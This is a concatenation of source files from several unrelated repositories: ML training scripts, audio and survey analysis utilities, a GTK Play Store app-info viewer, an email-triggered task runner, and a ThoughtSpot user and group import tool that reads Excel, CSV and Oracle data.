scores = cross_val_score(model, X_train, y_train, scoring=r2_scorer)
return scores.mean()
session = BTBSession(tunables, score_model, verbose=True)
best_proposal = session.run(iterations=100)
best_model = build_model(best_proposal['name'], best_proposal['config'])
best_model.fit(X_train, y_train)
pred = best_model.predict(X_test)
r2_result=r2_score(y_test, pred)
print('R2 score!!')
print(r2_result)
# now save the model in .pickle
os.chdir(curdir)
f=open(model_name,'wb')
pickle.dump(best_model, f)
f.close()
files.append(model_name)
files.append(folder)
model_dir=os.getcwd()
return model_name, model_dir, files
```
#### File: allie/training/train_safe.py
```python
import os, sys, shutil, pickle, json
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.pipeline import Pipeline
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier
import numpy as np
import pandas as pd
print('installing library')
os.system('pip3 install safe-transformer==0.0.5')
from SafeTransformer import SafeTransformer
def train_safe(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# only store transform and surrogate model
model_name=common_name_model+'.pickle'
files=list()
curdir=os.getcwd()
csvname=common_name_model.split('_')[0]
# get training and testing data
try:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train_transformed.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test_transformed.csv',os.getcwd()+'/test.csv')
except:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test.csv',os.getcwd()+'/test.csv')
# now load the training data as pandas dataframe
data=pd.read_csv('train.csv')
X_train=data.drop(columns=['class_'], axis=1)
y_train=data['class_']
print('Starting FIT')
if mtype in ['classification', 'c']:
print('CLASSIFICATION')
print('training surrogate model...')
surrogate_model = XGBClassifier().fit(X_train, y_train)
print('training base model...')
base_model = LogisticRegression().fit(X_train, y_train)
safe_transformer = SafeTransformer(model=surrogate_model, penalty=1)
pipe = Pipeline(steps=[('safe', safe_transformer), ('linear', base_model)])
print('training pipeline...')
pipe = pipe.fit(X_train, y_train)
elif mtype in ['regression', 'r']:
print('REGRESSION')
surrogate_model = GradientBoostingRegressor(n_estimators=100, max_depth=4, learning_rate=0.1,loss='huber')
print('training surrogate model...')
surrogate_model = surrogate_model.fit(X_train, y_train)
print('loading base model')
linear_model = LinearRegression()
safe_transformer = SafeTransformer(surrogate_model, penalty = 0.84)
print('training pipeline...')
pipe = Pipeline(steps=[('safe', safe_transformer), ('linear', linear_model)])
pipe = pipe.fit(X_train, y_train)
# SAVE SURROGATE ML MODEL
modelfile=open(model_name,'wb')
pickle.dump(pipe, modelfile)
modelfile.close()
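# Illustrative sketch (not part of the original script): the pickled object is a scikit-learn
# Pipeline, so a hypothetical consumer could reload and reuse it roughly like this:
#   with open(model_name, 'rb') as f:
#       pipe = pickle.load(f)
#   predictions = pipe.predict(X_test)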
files.append(model_name)
files.append('train.csv')
files.append('test.csv')
model_dir=os.getcwd()
return model_name, model_dir, files
``` |
{
"source": "jim-schwoebel/sound_event_detection",
"score": 2
} |
#### File: sound_event_detection/sed_vis/visualize.py
```python
import sys, sed_vis, dcase_util
def visualize_sample(audiofilepath, csvfilepath):
# taken from sed_vis documentation - https://github.com/TUT-ARG/sed_vis
# thanks Audio Research Group, Tampere University!
# Load audio signal first
audio_container = dcase_util.containers.AudioContainer().load(audiofilepath)
# Load event lists
reference_event_list = dcase_util.containers.MetaDataContainer().load(csvfilepath)
event_lists = {'reference': reference_event_list}
# Visualize the data
vis = sed_vis.visualization.EventListVisualizer(event_lists=event_lists,
audio_signal=audio_container.data,
sampling_rate=audio_container.fs)
vis.show()
audiofilepath=sys.argv[1]
csvfilepath=sys.argv[2]
visualize_sample(audiofilepath, csvfilepath)
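# Illustrative invocation (file names are hypothetical, not shipped with this repo):
#   python3 visualize.py recording.wav reference_events.csv
# The first argument is the audio file, the second the CSV of annotated events.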
``` |
{
"source": "jim-schwoebel/voiceome",
"score": 3
} |
#### File: scripts/references/metrics2.py
```python
import pandas as pd
import difflib
import numpy as np
import nltk
from nltk import word_tokenize
g=pd.read_csv('new2.csv')
labels=list(g)
for i in range(len(labels)):
if labels[i].lower().find('caterpillar') != -1:
caterpillar=labels[i]
def extract_transcript(transcript):
try:
return transcript.split(') ')[1]
except:
return ''
def animal_features(transcript, animal_list):
transcript=transcript.lower().split(' ')
count=0
for j in range(len(transcript)):
if transcript[j] in animal_list:
count=count+1
return count
def letterf_features(transcript):
transcript=transcript.lower().split(' ')
count=0
words=list()
for j in range(len(transcript)):
if transcript[j].startswith('f') and transcript[j] not in words:
count=count+1
words.append(transcript[j])
return count
def passage_features(transcript, reference):
# similarity (https://stackoverflow.com/questions/1471153/string-similarity-metrics-in-python)
# similarity
seq=difflib.SequenceMatcher(a=transcript.lower(), b=reference.lower())
# longest matching string
match = seq.find_longest_match(0, len(transcript), 0, len(reference))
return 100*seq.ratio() #, match.size, match.a, match.b
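# Quick sanity check (illustrative): identical strings score 100, e.g.
#   passage_features("the boy went home", "the boy went home") == 100.0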
def mean_std(list_):
array_=np.array(list_)
return np.mean(array_), np.std(array_)
animals=g['Category: ANIMALS. Name all the animals you can think of as quickly as possible before the time elapses below.']
words=list()
stopwords=['um', 'think','hum','oh',"let's",'blue','name','uhm','brown',"i'm",'category','ok','uh',
'time','ah', 'yeah', 'hey', 'love', 'lot', 'god', 'eh', 'funny', 'sure', 'honey', 'sugar',
'doc', 'email', 'al', 'il', 'rap', 'count', 'talk', 'check', 'ha', 'anything', 'jack', 'cheap',
'wow', 'world', 'devil', 'gosh', 'mama', 'please', 'kind', 'king', 'thing', 'sorry', 'see',
'awesome', 'uhm', 'yellow', 'tail', 'need', 'mu', 'search', 'wizard', 'kid', 'wanna', 'mind', 'girl',
'giant', 'fire', 'care', 'steak', 'weather', 'war', 'window', 'rock', 'ego', 'word', 'camera', 'square',
'kiwi', 'pie', 'cheat', 'kit', 'grey', 'warm', 'dumb', 'border', 'auto', 'god', 'fear', 'die', 'author', 'mix',
'experience', 'grow', 'aw', 'doe', 'drive', 'stuck', 'number', 'oil', 'fan', 'pay', 'amazon', 'problem', 'jesus',
'laugh', "i'd", 'ghost', 'cause', 'target', 'pay', 'mingo', 'tire', 'strange', 'bar', 'canadian', 'beef',
'wine', 'asp', 'poop', 'dollar', 'record', 'coca', 'exit', 'ceo', 'donald', 'blog', 'store', 'myth', 'act', 'ow',
'horny', 'alliana', 'gun', 'cina', 'firm', 'elf', 'walmart', 'remind', 'mr', 'underground', 'hurdle', 'payroll',
'commas', 'audi', 'salon', 'milk']
for i in range(len(animals)):
transcript=extract_transcript(animals[i]).lower().replace('.','').replace('?','').replace(',','').split()
for j in range(len(transcript)):
# check if the word is a noun
if nltk.pos_tag(word_tokenize(transcript[j]))[0][1] == 'NN' and transcript[j] not in stopwords:
words=words+[transcript[j]]
unique_words=list(set(words))
unique_counts=dict()
for i in range(len(unique_words)):
unique_counts[unique_words[i]]=words.count(unique_words[i])
g={k: v for k, v in sorted(unique_counts.items(), key=lambda item: item[1])}
print(list(g))
```
#### File: scripts/visualization/histogram_nonwords.py
```python
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
from matplotlib.ticker import PercentFormatter
import time, math
from nltk import FreqDist
import pandas as pd
from tqdm import tqdm
def get_variables(transcript):
# get transcript split
transcript=transcript.replace('.','').lower()
transcript=transcript.split()
# get top 10 word counts
unique=list(set(transcript))
counts=dict()
for k in range(len(unique)):
counts[unique[k]]=transcript.count(unique[k])
counts=list(sorted(counts.items(), key=lambda x: x[1], reverse=True))
x=list()
y=list()
count=0
i=0
while count < 5:
if str(counts[i][0]).replace(' ','') in ['nan', 'undefined']:
i=i+1
else:
x.append(counts[i][0])
y.append(counts[i][1])
count=count+1
i=i+1
return x, y
def get_transcript():
pass
csvfiles=['01_plive.csv', '02_fwov.csv', '03_zowl.csv', '04_zulx.csv', '05_vave.csv', '06_kwaj.csv', '07_jome.csv', '08_bwiz.csv', '09_broe.csv', '10_nayb.csv']
fig, axes = plt.subplots(nrows=2, ncols=5, figsize=(12, 8))
width = 0.4
for i in range(2):
for j in range(5):
# get transcript word
print((i)*5+j)
csvfile=csvfiles[(i)*5+j]
data=pd.read_csv(csvfile)
data=list(data['azure'])
transcript=''
for k in tqdm(range(len(data))):
transcript=transcript+' '+str(data[k])
x, y = get_variables(transcript)
axes[i, j].bar(x,y, color='navy', width=width)
axes[i, j].set_title(csvfiles[(i)*5+j].replace('.csv',''))
axes[i,j].set_ylim([0,2000])
for ax in axes.flat:
# xlabel='keyword',
ax.set(ylabel='counts')
ax.tick_params(axis='x', rotation=90)
fig.suptitle('Top 5 keywords across Nonword Naming Tasks for Survey A')
plt.tight_layout()
plt.show()
``` |
{
"source": "JimScope/apkdown",
"score": 3
} |
#### File: JimScope/apkdown/apkdown.py
```python
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
import json
import sys
import requests
from concurrent.futures.thread import ThreadPoolExecutor
from playstore.playstore import Playstore
# Default credentials file location.
credentials_default_location = 'credentials.json'
# Default directory where to save the downloaded applications.
downloaded_apk_default_location = 'Downloads'
class ApiData:
"""Retrieve data of the apk through the api"""
def __init__(self, package_name):
self.package_name = package_name
self.icon = False
try:
app = api.app_details(self.package_name).docV2
except:
print(
'Error when downloading "{0}". Unable to get app\'s details.'.
format(self.package_name))
sys.exit(1)
self.details = {
'package_name': app.docid,
'title': app.title,
'creator': app.creator
}
for image in app.image:
if image.imageType == 4:
response = requests.get(image.imageUrl)
if response.status_code == 200:
with open('apk_icon.png', 'wb') as f:
f.write(response.content)
self.icon = True
break
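# Illustrative (hypothetical) usage, assuming the module-level `api` client has been initialised:
#   info = ApiData("com.example.app").details
#   -> {'package_name': 'com.example.app', 'title': ..., 'creator': ...}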
class Downloader(Gtk.Window):
"""docstring for Downloader"""
def __init__(self):
self.builder = Gtk.Builder()
self.builder.add_from_file("gui.glade")
self.builder.connect_signals(self)
# Load windows from gui.glade
self.window = self.builder.get_object("MainWindow")
self.AboutDialog = self.builder.get_object("AboutDialog")
self.WindowConf = self.builder.get_object("WindowConf")
# Load objects from gui.glade
self.apk_image = self.builder.get_object("apk_image")
self.progressbar = self.builder.get_object("progressbar")
self.input_address = self.builder.get_object("input_address")
self.label_package = self.builder.get_object("label_package")
self.label_title = self.builder.get_object("label_title")
self.label_developer = self.builder.get_object("label_developer")
def on_MainWindow_destroy(self, *args):
thread.shutdown(wait=True)
Gtk.main_quit(*args)
def on_btn_about_clicked(self, widget):
self.AboutDialog.run()
self.AboutDialog.hide()
def on_btn_conf_clicked(self, button):
self.WindowConf.show()
def on_btn_save_clicked(self, button):
pass
def on_btn_download_clicked(self, button):
pass
def check_url(self, widget):
thread.submit(self.check)
def check(self):
package = self.input_address.get_text()
if package != '':
data = ApiData(package)
info = data.details
self.label_package.set_text(info['package_name'])
self.label_title.set_text(info['title'])
self.label_developer.set_text(info['creator'])
if data.icon == True:
self.apk_image.set_from_file('apk_icon.png')
else:
pass
if __name__ == '__main__':
try:
api = Playstore(credentials_default_location)
except:
print("Connect to Internet")
thread = ThreadPoolExecutor(1)
win = Downloader()
win.window.connect("delete_event", Gtk.main_quit)
win.window.show_all()
Gtk.main()
``` |
{
"source": "JimScope/PowerM",
"score": 3
} |
#### File: JimScope/PowerM/PowerM.py
```python
from time import sleep
import traceback
# Local Modules
import config
import emailer
import utilities
# Importing PowerM Modules
from modules.test import multiply
from modules.test import slow
from modules.admin import logs
def on_startup():
utilities.log("Starting up.")
# Ensure the user has setup the script
if config.email_user_name == "" or config.white_list == [] or config.email_password == "":
utilities.log("Email variables are not setup. Exiting.")
exit(1)
utilities.log("Waiting for startup delay.")
def read_commands():
messages = emailer.read()
#|
if messages is None:
# print("Empty")
pass
else:
for x in messages:
if x[1].startswith("$logs"):
thread_logs = logs.MyThread(x[0])
thread_logs.start()
if x[1].startswith("$multiply"):
keywords = x[1].lstrip("$multiply ")
thread_multiply = multiply.MyThread(x[0],keywords)
thread_multiply.start()
elif x[1].startswith("$slow"):
keywords = x[1].lstrip("$slow ")
thread_slow = slow.MyThread(x[0],keywords)
thread_slow.start()
#|
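# Illustrative (hypothetical) command format: an email from a whitelisted sender whose body
# starts with "$multiply 6 7" launches modules.test.multiply with keywords "6 7";
# "$slow ..." and "$logs" are dispatched the same way by the handlers above.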
def main():
on_startup()
try:
print("Welcome to PowerM\nCtrl-C to exit")
print("Waiting for startup delay.")
while True:
sleep(15)
read_commands()
except Exception:
# In case of an uncaught exception, get stacktrace for diag and exit.
trace_string = traceback.format_exc()
# log it locally in case internet is down
utilities.log("Something happened, I have crashed:\n" + trace_string)
# Build and send an email
sub = "PowerMail crashed"
msg = "Something went wrong with PowerMail, here is the stack trace:\n\n" + trace_string
emailer.send(config.support, sub, msg)
# Exit the program with error code 1
exit(1)
main()
``` |
{
"source": "JimSEvans/user_tools",
"score": 2
} |
#### File: user_tools/tsut/io.py
```python
import ast
import copy
import json
import csv
import os
import re
import logging
from openpyxl import Workbook  # needed by UGXLSWriter below
import xlrd  # needed by UGXLSReader to read Excel
import cx_Oracle
from .api import UsersAndGroups, User, Group, eprint, write_outcome_file
"""
Copyright 2018 ThoughtSpot
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# -------------------------------------------------------------------------------------------------------------------
"""Classes to read and write users and groups."""
class UGXLSWriter:
"""
Writes users and groups to an Excel spreadsheet.
"""
def write(self, users_and_groups, filename):
"""
Writes the content to the given file.
:param users_and_groups: The UsersAndGroups object to write.
:type users_and_groups: UsersAndGroups
:param filename: Name of the file to write to. No extension is expected and one will be added.
:type filename: str
"""
workbook = Workbook()
workbook.remove(
workbook.active
) # remove the default sheet since we'll be creating the ones we want.
self._write_users(workbook, users_and_groups.get_users())
self._write_groups(workbook, users_and_groups.get_groups())
if not (filename.endswith("xls") or filename.endswith("xlsx")):
filename += ".xlsx"
workbook.save(filename)
def _write_users(self, workbook, users):
"""
Writes the users to a worksheet.
:param workbook: The workbook to write to.
:type workbook: Workbook
:param users: The list of groups to write.
:type users: list of User
:return:
"""
ws = workbook.create_sheet(title="Users")
self._write_header(
ws,
[
"Name",
"Password",
"Display Name",
"Email",
"Groups",
"Visibility"
],
)
cnt = 2 # start after header.
for user in users:
ws.cell(column=1, row=cnt, value=user.name)
ws.cell(column=2, row=cnt, value=user.password)
ws.cell(column=3, row=cnt, value=user.displayName)
ws.cell(column=4, row=cnt, value=user.mail)
ws.cell(column=5, row=cnt, value=json.dumps(user.groupNames))
ws.cell(column=6, row=cnt, value=user.visibility)
cnt += 1
def _write_groups(self, workbook, groups):
"""
Writes the groups to a worksheet.
:param workbook: The workbook to write to.
:type workbook: Workbook
:param groups: The list of groups to write.
:type groups: list
:return:
"""
ws = workbook.create_sheet(title="Groups")
self._write_header(
ws,
[
"Name",
"Display Name",
"Description",
"Groups",
"Visibility",
"Privileges",
],
)
cnt = 2 # start after header.
for group in groups:
ws.cell(column=1, row=cnt, value=group.name)
ws.cell(column=2, row=cnt, value=group.displayName)
ws.cell(column=3, row=cnt, value=group.description)
ws.cell(column=4, row=cnt, value=json.dumps(group.groupNames))
ws.cell(column=5, row=cnt, value=group.visibility)
privileges = group.privileges if group.privileges else []
ws.cell(column=6, row=cnt, value=json.dumps(privileges))
cnt += 1
@staticmethod
def _write_header(worksheet, cols):
"""
Writes the header for the given worksheet in row 1.
:param worksheet: Worksheet to write to.
:param cols: List of columns to write.
"""
for ccnt in range(0, len(cols)):
worksheet.cell(column=(ccnt + 1), row=1, value=cols[ccnt])
class UGXLSReader:
"""
Reads user and group info from an Excel file that is formatted the same as the UGXLSWriter writes.
"""
required_sheets = ["Users", "Groups"]
required_columns = {
"Users": [
"Name",
"Password",
"Display Name",
"Email",
"Groups",
"Visibility"
],
"Groups": [
"Name",
"Display Name",
"Description",
"Groups",
"Visibility"
],
}
def __init__(self):
"""
Creates a new UGXLSReader
"""
self.workbook = None
self.indices = {}
self.users_and_groups = UsersAndGroups()
def read_from_excel(self, filepath):
"""
Reads users and groups from the given file.
:param filepath: Path to the Excel file to read from.
:type filepath: str
:return: Returns the users and groups read from the Excel file. The users and groups are not validated
so that they can be modified prior to validation.
:rtype: UsersAndGroups
"""
self.workbook = xlrd.open_workbook(filepath)
if self._verify_file_format():
self._get_column_indices()
self._read_users_from_workbook()
self._read_groups_from_workbook()
return self.users_and_groups
def _verify_file_format(self):
"""
:return: True if the format of the workbook is valid.
:rtype: bool
"""
is_valid = True
sheet_names = self.workbook.sheet_names()
for required_sheet in UGXLSReader.required_sheets:
if required_sheet not in sheet_names:
eprint("Error: missing sheet %s!" % required_sheet)
is_valid = False
else:
sheet = self.workbook.sheet_by_name(required_sheet)
header_row = sheet.row_values(rowx=0, start_colx=0)
for required_column in UGXLSReader.required_columns[
required_sheet
]:
if required_column not in header_row:
eprint(
"Error: missing column %s in sheet %s!"
% (required_column, required_sheet)
)
is_valid = False
return is_valid
def _get_column_indices(self):
"""
Reads the sheets to get all of the column indices. Assumes the format was already checked.
"""
sheet_names = self.workbook.sheet_names()
for sheet_name in sheet_names:
if sheet_name in self.required_sheets:
sheet = self.workbook.sheet_by_name(sheet_name)
col_indices = {}
ccnt = 0
for col in sheet.row_values(rowx=0, start_colx=0):
col_indices[col] = ccnt
ccnt += 1
self.indices[sheet_name] = col_indices
def _read_users_from_workbook(self):
"""
Reads all the users from the workbook.
"""
table_sheet = self.workbook.sheet_by_name("Users")
indices = self.indices["Users"]
for row_count in range(1, table_sheet.nrows):
row = table_sheet.row_values(rowx=row_count, start_colx=0)
# "Name", "Password", "Display Name", "Email", "Description", "Groups", "Visibility"
username = row[indices["Name"]]
password = row[indices["Password"]]
display_name = row[indices["Display Name"]]
email = row[indices["Email"]]
groups = []
if row[indices["Groups"]]:
groups = ast.literal_eval(
row[indices["Groups"]]
) # assumes a valid list format, e.g. ["a", "b", ...]
visibility = row[indices["Visibility"]]
try:
user = User(
name=username,
password=password,
display_name=display_name,
mail=email,
group_names=groups,
visibility=visibility,
)
# The format should be consistent with only one user per line.
self.users_and_groups.add_user(
user, duplicate=UsersAndGroups.RAISE_ERROR_ON_DUPLICATE
)
except:
eprint(f"Error reading user with name {username}")
def _read_groups_from_workbook(self):
"""
Reads all the groups from the workbook.
"""
table_sheet = self.workbook.sheet_by_name("Groups")
indices = self.indices["Groups"]
for row_count in range(1, table_sheet.nrows):
row = table_sheet.row_values(rowx=row_count, start_colx=0)
# Name", "Display Name", "Description", "Groups", "Visibility"
group_name = row[indices["Name"]]
display_name = row[indices["Display Name"]]
description = row[indices["Description"]]
visibility = row[indices["Visibility"]]
groups = []
if row[indices["Groups"]] and row[
indices["Groups"]
]:
groups = ast.literal_eval(
row[indices["Groups"]]
) # assumes a valid list format, e.g. ["a", "b", ...]
try:
group = Group(
name=group_name,
display_name=display_name,
description=description,
group_names=groups,
visibility=visibility,
)
# The format should be consistent with only one group per line.
self.users_and_groups.add_group(
group, duplicate=UsersAndGroups.RAISE_ERROR_ON_DUPLICATE
)
except Exception:
eprint("Error reading group with name %s" % group_name)
class UGCSVReader:
"""
Reads users and groups from CSV. All users come from the user_csv file and
groups are from the group_csv file.
"""
DEFAULT_USER_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"mail": "Email",
"password": "Password",
"group_names": "Groups",
"visibility": "Visibility"
}
DEFAULT_GROUP_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"description": "Description",
"group_names": "Groups",
"visibility": "Visibility",
"privileges": "Privileges"
}
def __init__(self,
user_field_mapping=DEFAULT_USER_FIELD_MAPPING,
group_field_mapping=DEFAULT_GROUP_FIELD_MAPPING,
delimiter=","):
"""
Creates a new CSV reader that can read based on the field mapping and delimiter. While this class can
cause groups to be created, the primary use is to read users along with the groups they belong to.
:param user_field_mapping: The mapping of columns to values for users.
:type user_field_mapping: dict of str:str
:param group_field_mapping: The mapping of columns to values for groups.
:type group_field_mapping: dict of str:str
:param delimiter: The delimiter to use.
"""
self.user_field_mapping = copy.copy(user_field_mapping)
self.group_field_mapping = copy.copy(group_field_mapping)
self.delimiter = delimiter
self.validate_fields()
def validate_fields(self):
"""
Verifies that the minimal required field mappings exist. Raises a ValueError if not.
:return: None
:raises: ValueError
"""
if "name" not in self.user_field_mapping.keys():
raise ValueError("Missing mapping for 'name' for use with user CSV.")
if "name" not in self.group_field_mapping.keys():
raise ValueError("Missing mapping for 'name' for use with groups CSV.")
def read_from_file(self, user_file, group_file=None):
"""
Loads users and groups from the files. If the group_file is not provided, the groups will be created from the
user file with just the names.
:param user_file: Path to the user file to read from.
:type user_file: str
:param group_file: Path to the group file to read from.
:type group_file: str
:return: Users and groups object.
:rtype: UsersAndGroups
"""
# initialize UsersAndGroups object to add User and Group objects to
uag = UsersAndGroups()
# Do minimal check on user CSV file, read, create User.
# Saving the column name that "name" maps to since I use it again later
user_name_column_name = self.user_field_mapping["name"]
column_names = None
with open(user_file, 'r') as uf:
csv_reader = csv.reader(uf)
csv_dict_reader = csv.DictReader(uf)
firstline = 1
for line in csv_dict_reader:
#for the first line, check column names
if firstline:
column_names = line.keys()
if user_name_column_name not in column_names:
raise ValueError("No column called '%s' in CSV" % user_name_column_name)
# create User object
#handle blanks in group_names column
groups_field_raw = line[self.user_field_mapping["group_names"]]
groups_field = "[]" if groups_field_raw == "" else groups_field_raw
u = User(
name = line[user_name_column_name],
display_name = line[self.user_field_mapping["display_name"]],
mail = line[self.user_field_mapping["mail"]],
password = line[self.user_field_mapping["password"]],
group_names = ast.literal_eval(groups_field),# assumes valid list format, e.g. ["a", "b", ...]
visibility = line[self.user_field_mapping["visibility"]]
)
#add User to UsersAndGroups object
uag.add_user(u)
firstline = 0
# If there, do minimal check on group CSV file, read, create Group.
# Saving the column name that "name" maps to since I use it again later
group_name_column_name = self.group_field_mapping["name"]
g_column_names = None
if group_file is not None:
with open(group_file, 'r') as gf:
g_csv_reader = csv.reader(gf)
firstline = 1
g_csv_dict_reader = csv.DictReader(gf)
for line in g_csv_dict_reader:
#for the first line, check column names
if firstline:
g_column_names = line.keys()
if group_name_column_name not in g_column_names:
raise ValueError("No column called '%s' in CSV" % group_name_column_name)
# create Group object
#handle blanks in group_names column
g_groups_field_raw = line[self.group_field_mapping["group_names"]]
g_groups_field = "[]" if g_groups_field_raw == "" else g_groups_field_raw
g = Group(
name = line[group_name_column_name],
display_name = line[self.group_field_mapping["display_name"]],
description = line[self.group_field_mapping["description"]],
privileges = line[self.group_field_mapping["privileges"]],
group_names = ast.literal_eval(line[self.group_field_mapping["group_names"]]),# assumes valid list format, e.g. ["a", "b", ...]
visibility = line[self.group_field_mapping["visibility"]]
)
#add User to UsersAndGroups object
uag.add_group(g)
firstline = 0
return uag
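# Illustrative (hypothetical) usage with the default column mapping:
#   uag = UGCSVReader().read_from_file("users.csv", group_file="groups.csv")
# where users.csv carries the headers Name, Display Name, Email, Password, Groups, Visibility.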
class UGOracleReader:
"""
Reads users and groups from Oracle.
"""
DEFAULT_USER_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"mail": "Email",
"password": "Password",
"group_names": "Groups",
"group_names2": "Groups2",
"group_names3": "Groups3",
"visibility": "Visibility"
}
DEFAULT_GROUP_FIELD_MAPPING = {
"name": "Name",
"display_name": "Display Name",
"description": "Description",
"group_names": "Groups",
"group_names2": "Groups2",
"group_names3": "Groups3",
"visibility": "Visibility",
"privileges": "Privileges"
}
def __init__(self,
user_field_mapping=DEFAULT_USER_FIELD_MAPPING,
group_field_mapping=DEFAULT_GROUP_FIELD_MAPPING):
"""
Creates a new Oracle reader.
:param user_field_mapping: The mapping of columns to values for users.
:type user_field_mapping: dict of str:str
:param group_field_mapping: The mapping of columns to values for groups.
:type group_field_mapping: dict of str:str
"""
self.user_field_mapping = copy.copy(user_field_mapping)
self.group_field_mapping = copy.copy(group_field_mapping)
self.validate_fields()
def validate_fields(self):
"""
Verifies that the minimal required field mappings exist. Raises a ValueError if not.
:return: None
:raises: ValueError
"""
if "name" not in self.user_field_mapping.keys():
raise ValueError("Missing mapping for 'name'.")
if "name" not in self.group_field_mapping.keys():
raise ValueError("Missing mapping for 'name'.")
def read_from_oracle(self, oracle_u_pw_dsn, oracle_config, users_sql, groups_sql, archive_dir, current_timestamp):
"""
Loads users and groups from Oracle. If the groups_sql is not provided, the groups will be created from the
user file with just the names.
:param users_sql: Path to the user query SQL file.
:type users_sql: str
:param groups_sql: Path to the group query SQL file.
:type groups_sql: str
:return: Users and groups object.
:rtype: UsersAndGroups
"""
if not archive_dir:
archive_dir = './archive/'
try:
os.makedirs(archive_dir)
except FileExistsError:
if os.path.isfile(archive_dir):
logging.warn("There is already a file called '{0}'. Query result CSV archives will instead be saved to '.' (the current working directory).").format(archive_dir)
archive_dir = './'
# check archive_dir (for archiving query results)
if not archive_dir.endswith('/'):
archive_dir += '/'
# initialize UsersAndGroups object to add User and Group objects to
uag = UsersAndGroups()
# Read in Oracle connection config file, SQL file(s), run query, do minimal check on result, and create User.
# Saving the column name that "name" maps to since I use it again later
user_name_column_name = self.user_field_mapping["name"]
if oracle_u_pw_dsn:
oracle_u, oracle_pw, oracle_dsn = oracle_u_pw_dsn.split(',')
try:
connection = cx_Oracle.connect(oracle_u, oracle_pw, oracle_dsn) # If this causes error, try setting $TNS_ADMIN to the dir containing tnsnames.ora
except Exception as e:
write_outcome_file(msg = "Failure. TS sync failed.\nCould not connect to Oracle DB.", successful=False)
logging.info("Wrote failure text file")
raise e
else:
with open(oracle_config) as json_file:
connect_data = json.load(json_file)
user = connect_data["user"]
password = connect_data["password"]
dsn_dict = connect_data["dsn"]
host = dsn_dict["host"]
port = dsn_dict["port"]
service_name = dsn_dict["service_name"]
dsn = cx_Oracle.makedsn(host=host, port=port, service_name=service_name)
# Connect
connection = cx_Oracle.connect(user=user, password=password, dsn=dsn)
# Query
cursor = connection.cursor()
cursor.execute("SET TRANSACTION READ ONLY")
if users_sql:
with open(users_sql) as sql_f:
sql = sql_f.read()
cursor.execute(sql)
column_names = [col[0] for col in cursor.description]
if user_name_column_name not in column_names:
raise ValueError("No column called '%s' in query results" % user_name_column_name)
query_results = cursor.fetchall() # a list
# Create Users and also add to archive file
user_archive_filename = '{0}users_to_sync_from_oracle{1}.csv'.format(archive_dir, current_timestamp)
with open(user_archive_filename, 'w') as user_archive_file:
user_writer = csv.DictWriter(user_archive_file, fieldnames=column_names)
user_writer.writeheader()
for tupl in query_results:
line = {} # TODO maybe change name to line_dict
for i in range(0, len(column_names)):
line.update({column_names[i]: tupl[i]})
user_writer.writerow(line)
groups_field = "[]"
groups2_field = "[]"
groups3_field = "[]"
if self.group_field_mapping["group_names"] in line.keys():
groups_field_val = line[self.group_field_mapping["group_names"]]
if groups_field_val:
groups_field = groups_field_val
else:
logging.warn("\"Groups\" is NULL in query results. Treating as \"[]\".")
if 'group_names2' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names2"] in line.keys():
groups2_field_val = line[self.group_field_mapping["group_names2"]]
if groups2_field_val:
groups2_field = groups2_field_val
else:
logging.warn("\"Groups2\" is NULL in query results. Treating as \"[]\".")
if 'group_names3' in self.group_field_mapping.keys():
if self.group_field_mapping["group_names3"] in line.keys():
groups3_field_val = line[self.group_field_mapping["group_names3"]]
if groups3_field_val:
groups3_field = groups3_field_val
else:
logging.warn("\"Groups3\" is NULL in query results. Treating as \"[]\".")
groups1, groups2, groups3 = [list(),list(),list()]
try:
groups1 = ast.literal_eval(groups_field)
except:
logging.warn("\"Groups\" column could not be evaluated as a Python list; using [].")
groups1 = []
try:
groups2 = ast.literal_eval(groups2_field)
except:
logging.warn("\"Groups2\" column could not be evaluated as a Python list")
try:
groups3 = ast.literal_eval(groups3_field)
except:
logging.warn("\"Groups3\" column could not be evaluated as a Python list")
all_groups_unfiltered = groups1 + groups2 + groups3 # assumes valid list format, e.g. ["a", "b", ...]
# TODO this is an arbitrary rule that I shouldn't hard-code in:
# Filter out group names ending in underscore.
all_groups = [x for x in all_groups_unfiltered if not x.endswith('_')]
diff = list(set(all_groups_unfiltered) - set(all_groups))
if len(diff) > 0:
logging.warn("You tried to assign {0} to group(s) whose name ends in '_', which this code prevents: {1}.".format(line[user_name_column_name],str(diff)))
# Note if there are repeats
if len(all_groups) != len(set(all_groups)):
mode = max(set(all_groups), key = all_groups.count)
logging.warn("(Combined) Groups column(s) contains at least 1 repeat (after filtering out bad group names, if any). The main or only offender: {0}. Repeats will be filtered out.".format(mode))
visibility_field = None
if 'visibility' in self.group_field_mapping.keys():
if self.group_field_mapping["visibility"] in line.keys():
visibility_field_val = line[self.group_field_mapping["visibility"]]
if visibility_field_val:
visibility_field = visibility_field_val
else:
